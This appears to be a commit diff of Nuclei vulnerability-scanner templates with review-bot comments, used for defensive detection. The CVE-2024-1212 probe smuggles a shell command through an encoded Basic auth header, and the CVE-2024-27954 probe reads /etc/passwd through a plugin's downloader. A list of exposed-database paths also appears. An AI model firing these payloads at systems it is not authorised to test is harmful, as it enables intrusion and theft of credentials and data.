# digest: 4b0a00483046022100ada13ee531e36c1b45b196bafc39386d03ee223d98f9d0c3d3bd6f0609c6101202210099f776bb4a582a65c321385adc3d8fa9ec6f3047e658c38c6da98c89dd82c7c9:922c64590222798bb761d5b6d8e72950
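Review bot: This template has no `metadata` block, while the other two DNS templates added in this commit declare `max-request: 1` and `verified: true`; adding `metadata:` with `max-request: 1` would keep the three consistent. The extractor `v=spf1(.+)` sets no `group`, so the reported value presumably includes the `v=spf1` prefix; add `group: 1` if only the mechanism list is wanted. A short comment in the description that a hit shows an SPF record exists, not that its policy is restrictive (for example one ending in `+all` or `?all`), would keep readers from treating the result as a pass.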

221
dns/txt-service-detect.yaml Normal file

@ -0,0 +1,221 @@
id: txt-service-detect
info:
name: DNS TXT Service - Detect
author: rxerium
severity: info
description: |
Finding the services companies use via their TXT records.
reference:
- https://www.abenezer.ca/blog/services-companies-use-txt-records
metadata:
max-request: 1
verified: true
tags: dns,txt
dns:
- name: "{{FQDN}}"
type: TXT
matchers-condition: or
matchers:
- type: word
name: "keybase"
words:
- "keybase-site-verification"
- type: word
name: "proton-mail"
words:
- "protonmail-verification"
- type: word
name: "webex"
words:
- "webexdomainverification"
- type: word
name: "apple"
words:
- "apple-domain-verification"
- type: word
name: "facebook"
words:
- "facebook-domain-verification"
- type: word
name: "autodesk"
words:
- "autodesk-domain-verification"
- type: word
name: "stripe"
words:
- "stripe-verification"
- type: word
name: "atlassian"
words:
- "atlassian-domain-verification"
- type: word
name: "adobe-sign"
words:
- "adobe-sign-verification"
- type: word
name: "zoho"
words:
- "zoho-verification"
- type: word
name: "have-i-been-pwned"
words:
- "have-i-been-pwned-verification"
- type: word
name: "knowbe4"
words:
- "knowbe4-site-verification"
- type: word
name: "jamf"
words:
- "jamf-site-verification"
- type: word
name: "parallels"
words:
- "parallels-domain-verification"
- type: word
name: "dropbox"
words:
- "dropbox-domain-verification"
- type: word
name: "vmware-cloud"
words:
- "vmware-cloud-verification"
- type: word
name: "canva"
words:
- "canva-site-verification"
- type: word
name: "mongodb"
words:
- "mongodb-site-verification"
- type: word
name: "slack"
words:
- "slack-domain-verification"
- type: word
name: "teamViewer"
words:
- "teamviewer-sso-verification"
- type: word
name: "bugcrowd"
words:
- "bugcrowd-verification"
- type: word
name: "cisco"
words:
- "cisco-site-verification"
- type: word
name: "palo-alto-networks"
words:
- "paloaltonetworks-site-verification"
- type: word
name: "twilio"
words:
- "twilio-domain-verification"
- type: word
name: "dell-technologies"
words:
- "dell-technologies-domain-verification"
- type: word
name: "1password"
words:
- "1password-site-verification"
- type: word
name: "duo"
words:
- "duo_sso_verification"
- type: word
name: "sophos"
words:
- "sophos-domain-verification"
- type: word
name: "pinterest"
words:
- "pinterest-site-verification"
- type: word
name: "citrix"
words:
- "citrix-verification-code"
- type: word
name: "zapier"
words:
- "zapier-domain-verification-challenge"
- type: word
name: "uber"
words:
- "uber-domain-verification"
- type: word
name: "zoom"
words:
- "zoom-domain-verification"
- type: word
name: "lastpass"
words:
- "lastpass-verification-code"
- type: word
name: "google-workspace"
words:
- "google-site-verification"
- type: word
name: "flexera"
words:
- "flexera-domain-verification"
- type: word
name: "yandex"
words:
- "yandex-verification"
- type: word
name: "calendly"
words:
- "calendly-site-verification"
- type: word
name: "docusign"
words:
- "docusign"
- type: word
name: "whimsical"
words:
- "whimsical"
# digest: 490a00463044022043132b95ad11ec72665418855d60e0d979abbe9957b18f9170981f4f4af22a72022054d2942e7554851cd1f043f99d5e119ff9e8943a635a891927b1897d270383b9:922c64590222798bb761d5b6d8e72950
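Review bot: The last two matchers use the bare words `docusign` and `whimsical`, while every other entry matches a full verification token such as `stripe-verification`. A TXT record that only mentions the vendor name, for example in a mail-policy record, would be reported as that service. Anchoring them to the key form of the record, e.g. `docusign=` and `whimsical=`, would remove those false positives, assuming those are the prefixes the vendors actually issue. The matcher name `teamViewer` is also the only mixed-case name in the list; `teamviewer` keeps result labels consistent.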


@ -27,7 +27,7 @@ info:
max-request: 1
vendor: mysqldumper
product: mysqldumper
tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss
tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper
http:
- method: GET
@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100de6cb5ae696eb8f0b8837ff02b5e53e8049e806e0253c9933027f7da28634071022100fc1518b608713661374a7f1ebd5ef01b8816925196928a73aa3882adf5bf8192:922c64590222798bb761d5b6d8e72950


@ -28,7 +28,7 @@ info:
max-request: 65
vendor: embedthis
product: goahead
tags: cve,cve2017,rce,goahead,bruteforce,kev,vulhub,embedthis
tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis
http:
- raw:
@ -117,4 +117,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100dec8b43170cf34ed98fbf83c8dc09389ffefda9fd823a123f509f32dbb63cc570220638e59f0bec3b3ab5a49d51408722e58ca5276e415dfaa2cb4821b2c65b295ac:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220121da3e7b07d35d6cc36396744f512a33ad3dc1ba36b7f99975e68d99f7950e50220073fc66cac1e0ba2aba9a53106e851591967dd64abdeb8b4d199284261e0417d:922c64590222798bb761d5b6d8e72950


@ -27,7 +27,7 @@ info:
max-request: 100
vendor: zabbix
product: zabbix
tags: cve2019,cve,bruteforce,auth-bypass,login,edb,zabbix
tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix
http:
- raw:
@ -48,4 +48,4 @@ http:
- type: status
status:
- 200
# digest: 490a004630440220626b2ab1255806a015af4a5a877b4cc26870eaa35262c5980d85b262263b2bad022029a7a7154e81df1a32ffc290eadfb2dfe71fd5c7dc9fbadbf4bc92c421ea6a48:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206e060526ed498e58aeb165e1a86c6dfb0f822270df28b1f37de9879abeb9453502205623412e5aa23b5444d28233dc3a09dd053b5d8c1d4138adc4bd5cf524207012:922c64590222798bb761d5b6d8e72950


@ -28,7 +28,7 @@ info:
vendor: automattic
product: sensei_lms
framework: wordpress
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,bruteforce,hackerone,wordpress,wp-plugin,automattic
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,fuzz,hackerone,wordpress,wp-plugin,automattic
http:
- method: GET
@ -56,4 +56,4 @@ http:
- type: status
status:
- 200
# digest: 490a0046304402207c51a21553085f96246b9b7a7b8fcb17455c8ede92140fc56ac74b94c60b3fcf022054295c2dbda0cd3975caa9c8ac89cd1d99b8f237e8fe3258e096d29e53f99f61:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220495ab4eeb68248ce94758f27eab64434c32477db41d51efff29e248a0bee54a102204decc78a0d04e9931c1440579656391f3cd9c5e45d86f0b672c44c99bc942d72:922c64590222798bb761d5b6d8e72950


@ -29,7 +29,7 @@ info:
vendor: anti-malware_security_and_brute-force_firewall_project
product: anti-malware_security_and_brute-force_firewall
framework: wordpress
tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project
tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan
http:
- raw:
@ -60,4 +60,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100eef0f765c6118556853d7fbe2dacb78f2e80b4b820d56e883878df1688544eb402205baf46c82ff1df66387173dd365185b8a1517ac070ededd1288d324488f2b15a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022059cd96c86ae45ea4aa0ae09c6c3740e9225be1edfbafa84a38473cad7830094d022100e1627acd2f09e5f64cb1285bd45bad4f3b7d95657dff74b6310bbcfdcf01c8c5:922c64590222798bb761d5b6d8e72950


@ -28,7 +28,7 @@ info:
vendor: citrix
product: sharefile_storage_zones_controller
shodan-query: title:"ShareFile Storage Server"
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,bruteforce,kev,citrix
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix
variables:
fileName: '{{rand_base(8)}}'
@ -60,4 +60,4 @@ http:
- type: dsl
dsl:
- 'BaseURL+ "/cifs/" + fileName + ".aspx"'
# digest: 4a0a00473045022100d934886760e9ccd26b8fc8bb22de25e8dd46427d5b1b2c0773a84cba9646446002206093910f6613687b25b29229ba4f688d9a5721012f2691c8079cdcc61a203332:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205da7cab8d8af553734b5f1c9203e90944a89fecdb12b73130bd97a508abf49bb022024325216beeb52a5e651a6cc678fc4dfa622158a1a0535f6464bb780be2f111a:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,47 @@
id: CVE-2024-1212
info:
name: Progress Kemp LoadMaster - Command Injection
author: DhiyaneshDK
severity: critical
description: |
Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
reference:
- https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster
- https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
- https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212
- https://nvd.nist.gov/vuln/detail/CVE-2024-1212
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-1212
cwe-id: CWE-78
epss-score: 0.00046
epss-percentile: 0.13478
metadata:
verified: true
max-request: 1
shodan-query: html:"LoadMaster"
tags: cve,cve2024,progress,rce,loadmaster
http:
- method: GET
path:
- "{{BaseURL}}/access/set?param=enableapi&value=1"
headers:
Authorization: "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="
matchers-condition: and
matchers:
- type: word
part: body
words:
- "bin"
- "mnt"
- "WWW-Authenticate: Basic"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220557f3f2f5ab7b8e23925a9acc4979743940842b4936843aaae68876e24ed24a4022100f067f077e0dae8b1aa1264efb248349fdd7e6f95341ca06cbab9c183402f4e99:922c64590222798bb761d5b6d8e72950
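Review bot: The word matcher is scoped to `part: body`, yet one of its three required words is `WWW-Authenticate: Basic`, which is normally a response header. If the affected endpoint really echoes that text in the body, a comment should say so; otherwise the `and` condition can never be satisfied and the template silently never fires. The other two words, `bin` and `mnt`, are three-letter substrings that add little confidence on their own. A one-line comment above the `Authorization` header describing what the encoded value contains would also let a reviewer audit the probe without decoding it.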


@ -0,0 +1,38 @@
id: CVE-2024-27954
info:
name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
reference:
- https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/
- https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
classification:
cvss-score: 9.8
cwe-id: CWE-918
cve-id: CVE-2022-1970
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/wp-automatic"
tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic
http:
- method: GET
path:
- "{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"link":"file:'
- type: regex
regex:
- "root:.*:0:0:"
# digest: 4a0a00473045022100fe0fefeeca090cd190ad427541a138e93717d0eac2f27c00a2eec4bf5a63e30902202c2a3213ac5e28f8244ed547d1dd868bc948638e4cddaacee81de6d2f9422da1:922c64590222798bb761d5b6d8e72950
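Review bot: Under `classification` the template sets `cve-id: CVE-2022-1970`, which does not match the template id `CVE-2024-27954` or any of its references. Findings grouped or exported by CVE id would be attributed to the wrong vulnerability, so the line should read `cve-id: CVE-2024-27954`. The block also gives a `cvss-score` with no `cvss-metrics` vector, unlike the CVE-2024-1212 template added in the same commit.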


@ -13,7 +13,7 @@ info:
cwe-id: CWE-522
metadata:
max-request: 1
tags: alibaba,default-login
tags: canal,alibaba,default-login
http:
- raw:
@ -42,5 +42,4 @@ http:
words:
- 'data":{"token"'
- '"code":20000'
# digest: 4a0a004730450220126d880af62775003a5b6029ad39aead9272e2a61bdaab710e896acf665d7064022100caa03f9b85633bd64fce0925f23720ac678e539c93355165426ed68a982d820e:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100dcf09580a68dde8267efb45c71a519054938eaa0f8389934c19a69f945ecbd73022010071bf196c1b070ee79de3c48c4227e6834381e641b486b2059ace96d8257d7:922c64590222798bb761d5b6d8e72950


@ -16,7 +16,7 @@ info:
verified: true
max-request: 200
shodan-query: title:"Oracle PeopleSoft Sign-in"
tags: default-login,peoplesoft,oracle,bruteforce
tags: default-login,peoplesoft,oracle,fuzz
http:
- method: POST
@ -82,4 +82,4 @@ http:
- type: status
status:
- 302
# digest: 490a00463044022050a7ba41878e766a7453e20f034e337465bb2c7e07eda9ce12ec916ed28df2d202205e97d0b986bb626f7127189fc4f889109ba9f20801a5a72cc406f9e6dcf5db4e:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022021caed0d7676a38577b2c3d3b6a6549f5bcb9942d4b96265587f639ae486006502203ec6b9e3cce73f65f0aaffe2ae6ea2835d44c5431bd579f08d3fe2450ccedb74:922c64590222798bb761d5b6d8e72950


@ -19,7 +19,7 @@ info:
vendor: adminer
product: adminer
max-request: 741
tags: panel,bruteforce,adminer,login,sqli
tags: panel,fuzz,adminer,login,sqli
http:
- raw:
@ -53,4 +53,4 @@ http:
group: 1
regex:
- '<span class="version">([0-9.]+)'
# digest: 4a0a00473045022100ee20baf11aa5604db68aa1754dd077e912192bd19c3e3586c7442a697f6ac22102204c689729457b6f71c285dfe1309b72f23ba46b69516e80c2baaad9b20bd4b77a:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100d1fcc4e636bdb5f3961f4541594d60ac0dc86688a2cda52de2530fbf4ca9b770022100d68508fb2d73378f62f821365ccc2f11f063da2ae73ded7792159a9a1c97e373:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,29 @@
id: softether-vpn-panel
info:
name: SoftEther VPN Panel - Detect
author: bhutch
severity: info
description: |
SoftEther VPN panel was detected.
metadata:
max-request: 1
verified: true
shodan-query: http.title:"SoftEther VPN Server"
tags: panel,vpn,softether
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>SoftEther VPN Server</title>"
- type: status
status:
- 202
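Review bot: This new template ends at the status matcher with no trailing `# digest:` line, while every other template in this commit carries one. Unless the line was lost in rendering, the file is being added unsigned and should be signed before merge so consumers can verify it. The status matcher also expects `202`, an unusual code for a panel page. If that is what the server returns, a comment such as `# SoftEther answers the panel request with 202, not 200` would stop a later edit from "correcting" it.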


@ -7,7 +7,7 @@ info:
description: PHP Source File is disclosed to external users.
metadata:
max-request: 1512
tags: exposure,backup,php,disclosure,bruteforce
tags: exposure,backup,php,disclosure,fuzz
http:
- method: GET
@ -136,4 +136,4 @@ http:
- "text/plain"
- "bytes"
condition: or
# digest: 4b0a00483046022100c733de0ef40feb46f3e0d6ba5996c622340ad6910a6ea85e9c1c4e8aa1939cd2022100b73afbe7b608bdd57d018fe31bdc23a620f2e6b965916193232c840782ef90d0:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022019ff7dd3ceced23dec05a238feaf346674305dde6a4a6613b965cf8d0500acfc02210092bbcbb84d7180e46714712507b6e6b108317250bc01d99b3d8eee50b2d7f393:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,155 @@
id: generic-db
info:
name: Generic Database File - Exposure
author: Michal Mikolas (nanuqcz)
severity: high
description: |
This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc.
reference:
- https://laravel.com/docs/11.x/database#sqlite-configuration # database/database.sqlite
- https://laravel.com/docs/5.2/database # database/database.sqlite
- https://github.com/laracasts/larabook/blob/master/app/config/database.php#L51 # app/database/production.sqlite
- https://forum.codeigniter.com/post-389846.html # writable/db.sqlite3
- https://github.com/codeigniter4projects/playground/blob/develop/.env.example#L33 # writable/database.db
- https://symfony.com/doc/current/doctrine.html#configuring-the-database # var/app.db
- https://symfony.com/doc/4.x/doctrine.html#configuring-the-database # var/app.db
- https://symfony.com/doc/3.x/doctrine.html # app/sqlite.db
- https://symfony.com/doc/2.x/doctrine.html # sqlite.db
- https://openclassrooms.com/forum/sujet/symfony3-sqlite-could-not-create-database # var/data/db.sqlite
- https://symfony.com/doc/current/reference/configuration/doctrine.html#doctrine-dbal-configuration # var/data/data.sqlite
- https://stackoverflow.com/questions/31762878/sqlite-3-database-with-django # db.sqlite3
- https://medium.com/@codewithbushra/using-sqlite-as-a-database-backend-in-django-projects-code-with-bushra-d23e3100686e # db.sqlite3
- https://gist.github.com/jwo/4512764?permalink_comment_id=2235763#gistcomment-2235763 # db/production.sqlite3
- https://stackoverflow.com/a/30345819/1632572 # db/production.sqlite3
- https://developerhowto.com/2018/12/29/build-a-rest-api-with-node-js-and-express-js/ # db.sqlite
- https://sqldocs.org/sqlite/sqlite-nodejs/ # mydb.sqlite
- https://stackoverflow.com/questions/41620788/error-database-connection-sqlite-is-missing-or-could-not-be-created-cakephp # app/data/app_db.sqlite
- https://stackoverflow.com/questions/2722383/using-sqlite3-with-cakephp # app/webroot/database.sqlite, app/database.sqlite
- https://levelup.gitconnected.com/how-to-connect-and-use-the-sqlite-database-in-codeigniter-3-48cd50d3e78d # application/databases/db.sqlite
- https://turmanauli.medium.com/how-to-connect-codeigniter-to-sqlite3-database-like-a-pro-2177497a6d30 # application/db/database.sqlite
- https://forum.codeigniter.com/thread-74522.html # application/Database/db1.db
- https://stackoverflow.com/a/37088960/1632572 # application/database/data.db
- https://docs.laminas.dev/tutorials/getting-started/database-and-models/ # data/*.db
- https://phalcon-nucleon.github.io/#!database/getting-started.html # storage/database/database.sqlite
- https://www.yiiframework.com/doc/blog/1.1/en/prototype.database # protected/data/*.db
- https://pusher.com/tutorials/rest-api-slim-part-1/ # db/database.db
- https://www.digitalocean.com/community/tutorials/how-to-use-the-fat-free-php-framework # db/database.sqlite
- https://doc.nette.org/en/database/configuration#toc-single-connection # app/Model/*.db
- https://www.sqlite.org/fileformat.html # SQLite file always starts with "SQLite format {sqlite_version}"
- https://en.wikipedia.org/wiki/List_of_file_signatures # SQLite binary signature: 53 51 4C 69 74 65 20 66 6F 72 6D 61 74 20
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
metadata:
max-request: 89
tags: files,database,exposure,sqlite,sqlite3,fuzz
http:
- method: GET
path:
- "{{BaseURL}}/{{path}}"
payloads:
path:
- database/database.sqlite
- database/production.db
- database/production.sqlite
- database/production.sqlite3
- app/database/production.sqlite
- writable/db.sqlite3
- writable/database.db
- var/app.db
- var/data/db.sqlite
- var/data/data.sqlite
- app/sqlite.db
- sqlite.db
- db.sqlite3
- db/production.sqlite3
- db.sqlite
- mydb.sqlite
- app/data/app_db.sqlite
- app/webroot/database.sqlite
- app/database.sqlite
- application/databases/db.sqlite
- application/db/database.sqlite
- application/Database/db1.db
- application/database/data.db
- data/app.db
- data/sqlite.db
- data/sqlite3.db
- data/database.db
- data/production.db
- storage/database/database.sqlite
- protected/data/app.db
- protected/data/sqlite.db
- protected/data/sqlite3.db
- protected/data/database.db
- protected/data/production.db
- db/database.db
- db/database.sqlite
- app/Model/app.db
- app/Model/sqlite.db
- app/Model/sqlite3.db
- app/Model/database.db
- app/Model/production.db
- app.db
- sqlite3.db
- app.sqlite
- app.sqlite3
- database.db
- database.sqlite
- database.sqlite3
- production.db
- production.sqlite
- production.sqlite3
- db/db.sqlite
- db/db.sqlite3
- db/sqlite.db
- db/sqlite3.db
- db/app.db
- db/app.sqlite
- db/app.sqlite3
- db/database.sqlite3
- db/production.db
- db/production.sqlite
- app/db.sqlite
- app/db.sqlite3
- app/sqlite3.db
- app/app.db
- app/app.sqlite
- app/app.sqlite3
- app/database.db
- app/database.sqlite3
- app/production.db
- app/production.sqlite
- app/production.sqlite3
- data/db.sqlite
- data/db.sqlite3
- data/app.sqlite
- data/app.sqlite3
- data/database.sqlite
- data/database.sqlite3
- data/production.sqlite
- data/production.sqlite3
- database/db.sqlite
- database/db.sqlite3
- database/sqlite.db
- database/sqlite3.db
- database/app.db
- database/app.sqlite
- database/app.sqlite3
- database/database.db
- database/database.sqlite3
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'startswith(body, "SQLite")' # SQLite file always starts with "SQLite format {sqlite_version}"
- 'contains(body, "CREATE TABLE")' # SQLite file usually contains "CREATE TABLE", meaning there is at least one table
- '!contains(body, "<html")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450220774c7ea36d2f6f3cb0c04baa3799540d2f306ccd5bd5c0fac8f19330142bac96022100f7919a4722b5363b5e4bffdb1785d7dbf746fe3dd261e089c46f206ac91e7f12:922c64590222798bb761d5b6d8e72950
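Review bot: The `!contains(body, "<html")` condition suppresses a true positive whenever the exposed database itself stores HTML, for instance page or post content, because the check runs over the whole file body. The signature check already excludes HTML error pages and can be made stricter instead: use `'startswith(body, "SQLite format 3")'` and drop the `<html` line. The `CREATE TABLE` condition also depends on how much of a large file the scanner reads, which is worth a comment next to it.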


@ -34,4 +34,4 @@ http:
- 'contains(body_1, "{{randstr}}")'
- 'contains(body_2, "{{randstr}}")'
condition: and
# digest: 4b0a00483046022100bba6a80d36a07519a4f1b8528ccff3881319bdcd199c51e9d78c319e8832cac8022100f86715b3dbd1438e11a557d63175be67feddc557a7e0bbfcfa6c1b764a48aa0d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100893d371d193cc0f4111cf8b61a2d092bf7820039aa9a6eecf49529c0d59ac41702201b80bdfb4007c9173b4cff9a55590cf605b0918021c8bbd96b3cc0294ecd5124:922c64590222798bb761d5b6d8e72950


@ -39,4 +39,4 @@ http:
- type: regex
regex:
- "root:.*:0:0:"
# digest: 4a0a0047304502203dfb9d94713bdd57f01a1037a1a475e92c22c7f2917019840a194b6d93960fe5022100d2d94c46b98286546a9bd02fe1229a1fb36b8d4e40d0dd981d1ad31662ab0a3c:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022044f5c4ce901be80e947968eba35f25a3f9606a5cd8936480fd0cf89bde3edf4f022041fe2163a6b12dcb07d1e872f3051eb642e9b10dcf52f59d3e5a9a8107cf7434:922c64590222798bb761d5b6d8e72950


@ -15,7 +15,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 4
tags: bruteforce,edb
tags: iis,edb
http:
- raw:
@ -44,4 +44,4 @@ http:
- type: dsl
dsl:
- "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"
# digest: 4b0a004830460221009bb41d08061c1ba58f9ba9d6da08c33ade50b3877f2e7aec5ecd20bb45a8b2f6022100e43b897605b6c1cb2720b460ebe592eceecec9662a9b51717e07568020ebcee2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502207f1f208de9031454a3413b7b13977ee8f563be5c0ad83771de6897fa56a46c7f022100ab113072a9c2f91610fedd3a50cae51b16e01fca22b04c80bfdd675f86c0e45b:922c64590222798bb761d5b6d8e72950


@ -45,4 +45,4 @@ http:
regex:
- "root:.*:0:0:"
part: body
# digest: 4a0a004730450220530a89eabafecafbf0a3de2f0ba62e33e25cefd85b20289a912eb5a15603ad51022100c63b246226590dd18a0c6e10508d8c5aed77d6ba23037197d980799866a876c1:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502210087a307489eb418f0906031bfc714587a7a63d61d3d748d51d61d33634454363502205b0a0800d1c4a85649d92cc90161e84a8539243c735643c99f74bc57483a3d77:922c64590222798bb761d5b6d8e72950


@ -13,7 +13,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 341
tags: bruteforce,mdb,asp
tags: fuzz,mdb,asp
http:
- raw:
@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502207843690e40ef53160e535662659535e27e49d4c23da29954cf7bae6db715b98c022100b90846e49879ba649cdd9e5bf68edd48a79c2d56641eaaa31d184f794a2e5d7f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100a9c05c6a0c6579c0639a578b69157823126b4bc4badc33f4dcb52408d2fbd2960220798dd8340f94afec52275e40be3cdcf758b8a052afb2e0233aa34653cb33f22d:922c64590222798bb761d5b6d8e72950


@ -41,4 +41,4 @@ http:
group: 2
regex:
- '<version>(<!\[CDATA\[)?([0-9.]+)'
# digest: 480a00453043021f14baaa0b076a2383aaab7e8b12ff5b1cc3a99adc343d2ec8387b72d652471402205dd96fa59febb8d09977684cc0944a47a5b5ae3a38a37643da069caebd330962:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022000c79d13083e771d6537a2043861c4ba6c2cb53693cde7fef5e1b20d86c52b070221009b43b0876fcac5d7ed73100bb4429edb23cbd9cd5e60bc1262ec97f501f2c9f4:922c64590222798bb761d5b6d8e72950


@ -10,7 +10,7 @@ info:
- https://twitter.com/ImoJOnDz/status/1649089777629827072
metadata:
max-request: 9
tags: ssrf,proxy,oast,bruteforce
tags: ssrf,proxy,oast,fuzz
http:
- payloads:
@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
# digest: 490a0046304402206be4527be73a1a8aaf704109373b9377f5e8bb8392a592501c5058465df0471902200f9adedf455a7f7693921716076874158203e3a0e5406f09455f406e26aeca7a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100a67262dade744735b407460dddcbd5a203e9b5f727aa16b5c330df7272a6b861022038ed13f440b833327d52a233383b13bc6a9cd1ee7cf5bb2922c88e4b5c0a6960:922c64590222798bb761d5b6d8e72950


@ -22,4 +22,4 @@ http:
part: header
words:
- "COMPASS"
# digest: 4a0a0047304502200edc0a5fa3514b05b3d4ce38fcbb898a89899c0fc3a18fabc6a34b166367782e022100d87c600c6cf948cfb36b407fec959e5497b49e343a13f571b4e7a2598b1979f1:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220173dd3ccec570c2d5733e4d455286748ff4709a84688d038c8fec9746546c45b022100cee1597a2837410bd6e0fd7635536ddac9a8d293c43439c064d07e3e618b4e7d:922c64590222798bb761d5b6d8e72950


@ -791,4 +791,4 @@ http:
- '(?)content="CloudWAF"'
- 'Server: CloudWAF'
- 'Set-Cookie: HWWAFSESID='
# digest: 4a0a00473045022100cc858e9365b5bcfb441851a229e722ebcc673b7dcf0fe930bea0fe5d8954cf140220661071f8223b6b31c6bc77ce8f9643c077616a08ab412f211c1f2773341530a5:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220275dcc9d58d2ffaa091cd84f5b5ecb66c741d4fa2efa3de2b32dece8e7797fba022100d831918396c34900b70d06c6098b07c962117058264d35a02779d8a0be73ff58:922c64590222798bb761d5b6d8e72950


@ -34,4 +34,4 @@ http:
regex:
- "===\\s(.*)\\s===" # extract the plugin name
- "(?m)Stable tag: ([0-9.]+)" # extract the plugin version
# digest: 4a0a00473045022011ffc9134eaa01b62eddcdbbc33af59e33613478dd206665d9f12d60ea4fe114022100a6845b777b51f0d3959d009a91f612b73b13c9a5dc6fe6d058bd37994d64fe6a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502200e48b2e398c9ec8a1559e96019434ea839eb470a98d198af18a947332f02113f022100b17c8201e44fb304f1e57baa15a4e848388a42fbce942358454565d1658facb2:922c64590222798bb761d5b6d8e72950


@ -26,4 +26,4 @@ http:
- type: word
words:
- "== Description =="
# digest: 490a0046304402205e9f7b61bf29869a2a1dc2da01f5bd8bbd23c0db195ed14cb6ad78d431cf7fa2022022903f13f5ee4a17cee2b1ed42eff80e29a72f3a0da7a463acc2e9121cbf1ed2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220480caf586b5c260399e7e884b1e6c1e572a4bab84eae480feeb084868b38fa6702210092094fb5cb64bdfb9ff293289f131e98cb1dd8eb2d6a28cfa791db49afc7dac4:922c64590222798bb761d5b6d8e72950


@ -14,7 +14,7 @@ info:
cwe-id: CWE-1391
metadata:
max-request: 276
tags: wordpress,default-login,bruteforce
tags: wordpress,default-login,fuzz
http:
- raw:
@ -45,4 +45,4 @@ http:
- type: status
status:
- 302
# digest: 4b0a004830460221008e46a934459d64782ed14afbd9e908a5cb090a14f0b0ac3a18d94aab84b1880b022100dc8c92494fac2b31cc1fe4a03635e9c39622cfdf0f552a5344cb759d3c6904d3:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402200c1408ee282f07a88d599b6e9e31b0bdb3d2e4fd0f027c30193d370a45b896ff022066ac3030dc876bd69dd867e59e9e985c250becbe504d1274ce392ae5436e1758:922c64590222798bb761d5b6d8e72950


@ -32,4 +32,4 @@ http:
- "status_code_1 == 403 && status_code_2 != 403"
- "status_code_1 == 403 && status_code_3 != 403"
condition: or
